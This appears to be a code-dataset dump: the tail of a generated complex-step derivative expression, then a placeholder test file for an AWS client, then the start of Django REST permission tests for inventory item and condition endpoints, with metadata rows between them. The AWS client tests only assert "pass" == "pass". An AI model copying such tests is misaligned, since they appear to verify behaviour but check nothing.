xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*xb*yb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s*p23_n*p23_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s*p23_n*p23_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_s*p23_n*p23_s*y_n*y_s*yb*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s*p23_n*p23_s*yb**2*(1.0e-100*1j + p13_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-lamP12_N*p11_n*p11_s*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p12_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_s*yb**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p22_s*y_n*y_s*yb*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_s*yb**2*(1.0e-100*1j + p22_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_s*x_n*x_s*yb*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_s*xb*y_n*y_s*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_s*xb*yb*(1.0e-100*1j + p22_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_s*p23_n*y_n**2*y_s**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_s*p23_n*y_n*y_s*yb*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_s*p23_n*yb**2*(1.0e-100*1j + p22_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(lamP22_N*p23_s*v*(1.0e-100*1j + p23_n)*cos(theta_n*theta_s)/p22_s - lamP13_N*p11_n*p11_s*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_s*y_n*y_s*yb*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_s*x_n*x_s*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_s*xb*y_n*y_s*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*xb*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_s*y_n*y_s*yb*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_s*yb**2*(1.0e-100*1j + p23_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-lamP13_N*p33_s*v*(1.0e-100*1j + p33_n)*sin(theta_n*theta_s)/p13_s + lamP23_N*p33_s*v*(1.0e-100*1j + p33_n)*cos(theta_n*theta_s)/p23_s)/1e-100),
tf*0,
])
tock = toc()
print(gx)
print('N:' + str(tock))
print(fx-gx)
| 762.776596
| 13,295
| 0.570285
| 22,234
| 71,701
| 1.543807
| 0.003238
| 0.066599
| 0.082389
| 0.079359
| 0.985608
| 0.983802
| 0.98118
| 0.979228
| 0.973168
| 0.96842
| 0
| 0.169325
| 0.10269
| 71,701
| 94
| 13,296
| 762.776596
| 0.364186
| 0
| 0
| 0.12987
| 0
| 0
| 0.000056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.051948
| 0
| 0.051948
| 0.064935
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a6d39f0aca95fe01957c9787c5e5277c9a68086e
| 832
|
py
|
Python
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | 4
|
2021-06-10T05:41:39.000Z
|
2021-12-17T14:51:45.000Z
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | 3
|
2021-12-10T20:55:06.000Z
|
2022-01-28T00:27:18.000Z
|
aws_data_tools/client/tests/test_client.py
|
timoguin/aws-data-tools-py
|
f986daea360d3ffdb49a60c28d150254bb76b251
|
[
"MIT"
] | null | null | null |
from aws_data_tools.client import APIClient # noqa: F401
class TestAPIClient:
"""Test the APIClient class"""
def test_api(self):
"""Test API calls with the client"""
assert "pass" == "pass"
def test_init_with_client(self):
"""Test initializing an APIClient with a custom botocore client being passed"""
assert "pass" == "pass"
def test_init_with_client_kwargs(self):
"""Test APIClient init with kwargs for the botocore client"""
assert "pass" == "pass"
def test_init_with_session(self):
"""Test initializing an APIClient with a custom botocore session being passed"""
assert "pass" == "pass"
def test_init_with_session_kwargs(self):
"""Test APIClient init with kwargs for the botocore session"""
assert "pass" == "pass"
| 32
| 88
| 0.65625
| 106
| 832
| 4.990566
| 0.292453
| 0.090737
| 0.132325
| 0.128544
| 0.714556
| 0.714556
| 0.714556
| 0.714556
| 0.533081
| 0.192817
| 0
| 0.004754
| 0.241587
| 832
| 25
| 89
| 33.28
| 0.833597
| 0.395433
| 0
| 0.416667
| 0
| 0
| 0.084746
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.416667
| false
| 0.416667
| 0.083333
| 0
| 0.583333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
470efd1a2cd51e72d6821a16e463fa493139be40
| 52,602
|
py
|
Python
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 10
|
2015-02-16T17:12:44.000Z
|
2021-06-04T18:14:01.000Z
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 1
|
2021-09-20T01:17:38.000Z
|
2021-09-20T01:17:50.000Z
|
inventory/invoices/api/tests/test_invoices_api.py
|
cnobile2012/inventory
|
bc09ccdead39a5cd758088dbfe5c56dec43c7e29
|
[
"MIT"
] | 5
|
2015-09-09T02:01:33.000Z
|
2021-05-29T09:09:14.000Z
|
# -*- coding: utf-8 -*-
#
# inventory/invoices/api/tests/test_invoices_api.py
#
from django.contrib.auth import get_user_model
from dcolumn.dcolumns.models import ColumnCollection
from rest_framework.reverse import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from inventory.common.api.tests.base_test import BaseTest
from inventory.invoices.models import Condition, Item, Invoice, InvoiceItem
from inventory.projects.models import Membership
UserModel = get_user_model()
class TestConditionAPI(BaseTest, APITestCase):
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
def test_GET_condition_list_with_invalid_permissions(self):
"""
Test the condition_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
uri = reverse('condition-list')
self._test_users_with_invalid_permissions(
uri, method, default_user=False)
def test_GET_condition_list_with_valid_permissions(self):
"""
Test the condition_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
uri = reverse('condition-list')
self._test_users_with_valid_permissions(
uri, method, default_user=False)
def test_OPTIONS_condition_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('condition-list')
self._test_users_with_invalid_permissions(
uri, method, default_user=False)
def test_OPTIONS_condition_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('condition-list')
self._test_users_with_valid_permissions(
uri, method, default_user=False)
def test_GET_condition_detail_with_invalid_permissions(self):
"""
Test that a GET on the condition_detail fails with invalid
permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
uri = reverse('condition-detail', kwargs={'pk': 1})
self._test_users_with_invalid_permissions(uri, method)
def test_GET_condition_detail_with_valid_permissions(self):
"""
Test that a GET to condition_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
uri = reverse('condition-detail', kwargs={'pk': 1})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
def test_OPTIONS_condition_detail_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('condition-detail', kwargs={'pk': 1})
self._test_users_with_invalid_permissions(uri, method)
def test_OPTIONS_condition_detail_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('condition-detail', kwargs={'pk': 1})
self._test_users_with_valid_permissions(uri, method)
class TestItemAPI(BaseTest, APITestCase):
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
# Create an InventoryType and Project.
self.in_type = self._create_inventory_type()
members = [
{'user': self.user, 'role_text': self.PROJECT_USER}
]
self.project = self._create_project(self.in_type, members=members)
kwargs = {'public_id': self.project.public_id}
self.project_uri = reverse('project-detail', kwargs=kwargs)
# Create a ColumnCollection
kwargs = {}
kwargs['name'] = "Test Collection"
kwargs['related_model'] = 'item'
kwargs['creator'] = self.user
kwargs['updater'] = self.user
self.collection = ColumnCollection(**kwargs)
self.collection.save()
def _create_shared_project_objects(self):
# Add the default user to the default project and create an item
item_number_0 = "LM7805"
item_0 = self._create_item(
self.project, self.collection, item_number_0)
uri = reverse('item-detail', kwargs={'public_id': item_0.public_id})
# Create a second user
user, client = self._create_user(
username="SecondUser", password="0987654321")
# Create second project with second user
members = [
{'user': user, 'role_text': self.PROJECT_USER}
]
project = self._create_project(self.in_type, members=members)
# Create an item for second project sharing default project
item_number_1 = "NE555"
item_1 = self._create_item(project, self.collection, item_number_1)
return client, uri, self.project, item_0, project, item_1
def test_GET_item_list_with_invalid_permissions(self):
"""
Test the item_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
item_number = "NE555"
item = self._create_item(self.project, self.collection, item_number)
uri = reverse('item-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_item_list_with_valid_permissions(self):
"""
Test the item_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
item_number = "NE555"
item = self._create_item(self.project, self.collection, item_number)
uri = reverse('item-list')
self._test_users_with_valid_permissions(uri, method,
default_user=False)
self._test_project_users_with_valid_permissions(uri, method)
def test_POST_item_list_with_invalid_permissions(self):
"""
Test that a POST to item_list fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('item-list')
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE555'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_POST_item_list_with_valid_permissions(self):
"""
Test that a POST to item_list passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('item-list')
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE555'
su['project'] = self.project_uri
ad = data.setdefault('AD', su.copy())
ad['item_number'] = 'NE556N'
du = data.setdefault('DU', su.copy())
du['item_number'] = 'LM311'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['item_number'] = 'UA1489'
pma = data.setdefault('PMA', su.copy())
pma['item_number'] = 'UA1488'
pdu = data.setdefault('PDU', su.copy())
pdu['item_number'] = 'LM393D'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_OPTIONS_item_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
uri = reverse('item-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_item_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('item-list')
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_GET_item_detail_with_invalid_permissions(self):
"""
Test that a GET on the item_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'get'
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_item_detail_with_valid_permissions(self):
"""
Test that a GET to item_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_PUT_item_detail_with_invalid_permissions(self):
"""
Test that a PUT to item_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE555'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PUT_item_detail_with_valid_permissions(self):
"""
Test that a PUT to item_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE555'
su['project'] = self.project_uri
ad = data.setdefault('AD', su.copy())
ad['item_number'] = 'NE556N'
du = data.setdefault('DU', su.copy())
du['item_number'] = 'LM311'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['item_number'] = 'UA1489'
pma = data.setdefault('PMA', su.copy())
pma['item_number'] = 'UA1488'
pdu = data.setdefault('PDU', su.copy())
pdu['item_number'] = 'LM393D'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_PATCH_item_detail_with_invalid_permissions(self):
"""
Test that a PATCH to item_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE556N'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PATCH_item_detail_with_valid_permissions(self):
"""
Test that a PATCH to item_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
method = 'patch'
data = {}
su = data.setdefault('SU', {})
su['item_number'] = 'NE556N'
ad = data.setdefault('AD', {})
ad['item_number'] = 'LM311'
du = data.setdefault('DU', {})
du['item_number'] = 'UA1489'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', {})
pow['item_number'] = 'UA1488'
pma = data.setdefault('PMA', {})
pma['item_number'] = 'LM393D'
pdu = data.setdefault('PDU', {})
pdu['item_number'] = 'ULN2003A'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_DELETE_item_detail_with_invalid_permissions(self):
"""
Test that a DELETE to item_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'delete'
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_DELETE_item_detail_with_valid_permissions(self):
"""
Test that a DELETE to item_detail pass' with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'delete'
# Test SUPERUSER
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_superuser_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test ADMINISTRATOR
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_administrator_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test DEFAULT_USER
## This is an invalid test since the DEFAULT_USER has no access.
# Test PROJECT_OWNER
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_project_owner_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_MANAGER
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_project_manager_with_valid_permissions(uri, method)
self._test_valid_GET_with_errors(uri)
# Test PROJECT_USER
## This is an invalid test since the PROJECT_USER has no access.
def test_OPTIONS_item_detail_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_item_detail_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
#self.skipTest("Temporarily skipped")
method = 'options'
item = self._create_item(self.project, self.collection, "NE555")
uri = reverse('item-detail', kwargs={'public_id': item.public_id})
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
#
# Test Business Rules
#
def test_POST_item_list_PROJECT_USER_invalid_permissions(self):
"""
Test that a POST by a PROJECT_USER fails.
"""
uri = reverse('item-list')
data = {}
data['item_number'] = 'NE555'
# Test that second project cannot read default project's item.
response = self.client.post(uri, data=data, **self.HEADERS)
msg = (f"Response: {response.status_code} "
f"should be {status.HTTP_400_BAD_REQUEST}, "
f"content: {response.data}, uri: {uri}")
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST, msg)
def test_GET_only_shared_projects(self):
"""
Test read only capability of item from shared projects.
"""
#self.skipTest("Temporarily skipped")
# Create objects
(client, uri,
project_0, item_0,
project_1, item_1) = self._create_shared_project_objects()
# Test that second project cannot read default project's item.
response = client.get(uri, **self.HEADERS)
msg = (f"Response: {response.status_code} "
